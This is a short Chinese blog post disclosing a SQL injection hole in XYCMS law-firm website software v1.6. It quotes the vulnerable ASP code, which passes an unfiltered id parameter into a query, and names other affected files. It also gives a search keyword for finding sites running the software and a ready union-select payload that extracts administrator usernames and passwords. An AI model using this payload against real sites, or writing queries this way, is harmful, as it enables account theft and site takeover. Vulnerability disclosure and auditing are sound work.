关注我们
QRcode 邮件联系 QRcode
主页 » 信息安全 » 正文

XYCMS律师事务所建站系统注入漏洞

 feng  1,426 ℃  0条点评

作者:Liuker
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似

淫荡分割线
--------------------------------------------------------

审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
源码地址:http://down.chinaz.com/soft/29233.htm

漏洞文件:shownews.asp
漏洞代码:7-13行

<%
id=request.QueryString("id")
set snews=server.createobject("adodb.recordset")
exec="select * from [news] where id="&id
snews.open exec,conn,1,1
%>

什么过滤都没有  直造成注入

注入点:http://127.0.0.1:99/shownews.asp?id=xx

其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找

关键字:律师 powered by xycms
exp: union select 1,admin,password,4,5,7 from admin_user

本文标签:
最新ESPCMS漏洞之cookie注入分析
CSDJCMS漏洞 程氏舞曲管理系统V3.0拿shell
Joy:一款用于捕获和分析网络内部流量数据的工具Joy:一款用于捕获和分析网络内部流量数据的工具One-Lin3r:懒人的福音,渗透测试单行化工具One-Lin3r:懒人的福音,渗透测试单行化工具EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具国产网站恶意代码监测(网马监控)工具优化版国产网站恶意代码监测(网马监控)工具优化版

已有0条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

国际惯例, 沙发拿下 . . .


注册帐号  |  忘记密码